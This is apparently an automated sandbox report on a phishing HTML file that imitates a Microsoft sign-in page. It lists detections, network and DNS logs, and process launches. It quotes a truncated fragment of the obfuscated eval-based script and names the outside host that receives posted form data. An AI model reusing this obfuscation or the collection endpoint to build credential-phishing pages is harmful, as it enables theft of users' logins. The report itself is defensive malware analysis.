Click to jump to signature section
Source: Yara match | File source: 2.2.pages.csv, type: HTML |
Source: Yara match | File source: 1.1.pages.csv, type: HTML |
Source: 0.0.id.script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/ATTT003.html... This script exhibits several high-risk behaviors, including dynamic code execution through the use of `eval` and the `Function` constructor, as well as potential data exfiltration through obfuscated URLs and strings. The script also performs aggressive DOM manipulation, which could be used for malicious purposes. Overall, the combination of these behaviors indicates a high-risk script that requires further investigation. |
Source: ATTT003.html | HTTP Parser: Low number of body elements: 0 |
Source: file:///C:/Users/user/Desktop/ATTT003.html | Tab title: Sign in to your account |
Source: file:///C:/Users/user/Desktop/ATTT003.html# | Tab title: Sign in to your account |
Source: ATTT003.html | HTTP Parser: <script>let rh13z8jemt = 'dG9ydGRvY3VzaWduQGFyY2hlcnN5c3RlbXMuY29t'; // Jowl labore sirloin voluptate.let lXX2;!function(){const Uf2H=Array.prototype.slice.call(arguments);return eval("(function MZgG(vfoy){const PCgy=zkty(vfoy,Hs6x(MZgG.toString(... |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Number of links: 0 |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: <input type="password" .../> found but no <form action="... |
Source: ATTT003.html | HTTP Parser: Base64 decoded: tortdocusign@archersystems.com |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Title: Sign in to your account does not match URL |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Invalid link: Privacy statement |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: Has password / email / username input fields |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: <input type="password" .../> found |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No favicon |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No favicon |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No <meta name="author".. found |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: No <meta name="copyright".. found |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49749 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49881 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:60682 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:60703 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:60705 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:60708 version: TLS 1.2 |
Source: global traffic | TCP traffic: 192.168.2.6:60659 -> 162.159.36.2:53 |
Source: Joe Sandbox View | IP Address: 104.21.48.1 104.21.48.1 |
Source: Joe Sandbox View | IP Address: 104.21.48.1 104.21.48.1 |
Source: Joe Sandbox View | IP Address: 104.18.10.207 104.18.10.207 |
Source: Joe Sandbox View | IP Address: 104.18.10.207 104.18.10.207 |
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: unknown | TCP traffic detected without corresponding DNS query: 40.113.103.199 |
Source: global traffic | HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 1419993777-1317754460.cos.ap-singapore.myqcloud.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 1419993777-1317754460.cos.ap-singapore.myqcloud.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /next.php HTTP/1.1Host: ableg.filevaultaccounting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /next.php HTTP/1.1Host: ableg.filevaultaccounting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | HTTP traffic detected: GET /next.php HTTP/1.1Host: ableg.filevaultaccounting.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: global traffic | DNS traffic detected: DNS query: code.jquery.com |
Source: global traffic | DNS traffic detected: DNS query: cdnjs.cloudflare.com |
Source: global traffic | DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com |
Source: global traffic | DNS traffic detected: DNS query: stackpath.bootstrapcdn.com |
Source: global traffic | DNS traffic detected: DNS query: 1419993777-1317754460.cos.ap-singapore.myqcloud.com |
Source: global traffic | DNS traffic detected: DNS query: ableg.filevaultaccounting.com |
Source: global traffic | DNS traffic detected: DNS query: www.google.com |
Source: global traffic | DNS traffic detected: DNS query: aadcdn.msftauth.net |
Source: unknown | HTTP traffic detected: POST /next.php HTTP/1.1Host: ableg.filevaultaccounting.comConnection: keep-aliveContent-Length: 13sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9 |
Source: chromecache_97.3.dr, chromecache_96.3.dr | String found in binary or memory: http://opensource.org/licenses/MIT). |
Source: chromecache_87.3.dr, chromecache_99.3.dr | String found in binary or memory: https://getbootstrap.com) |
Source: chromecache_92.3.dr, chromecache_95.3.dr | String found in binary or memory: https://getbootstrap.com/) |
Source: chromecache_92.3.dr, chromecache_87.3.dr, chromecache_95.3.dr, chromecache_99.3.dr | String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE) |
Source: chromecache_92.3.dr, chromecache_87.3.dr, chromecache_95.3.dr, chromecache_99.3.dr | String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors) |
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60706 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60702 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49845 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49881 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60708 |
Source: unknown | Network traffic detected: HTTP traffic on port 49919 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60707 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60706 |
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49909 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60705 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60703 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60702 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49801 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49845 |
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60682 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49881 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60708 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49801 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49919 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49913 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758 |
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752 |
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750 |
Source: unknown | Network traffic detected: HTTP traffic on port 60707 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49913 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60703 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 60682 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49909 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49709 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49749 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49881 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:60682 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:60703 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:60705 version: TLS 1.2 |
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:60708 version: TLS 1.2 |
Source: classification engine | Classification label: mal68.phis.winHTML@30/27@32/15 |
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATTT003.html" | |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2240,i,11334264486578385736,16355265901838130039,262144 /prefetch:8 | |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2240,i,11334264486578385736,16355265901838130039,262144 /prefetch:8 | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | Jump to behavior |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: file:///C:/Users/user/Desktop/ATTT003.html | HTTP Parser: file:///C:/Users/user/Desktop/ATTT003.html |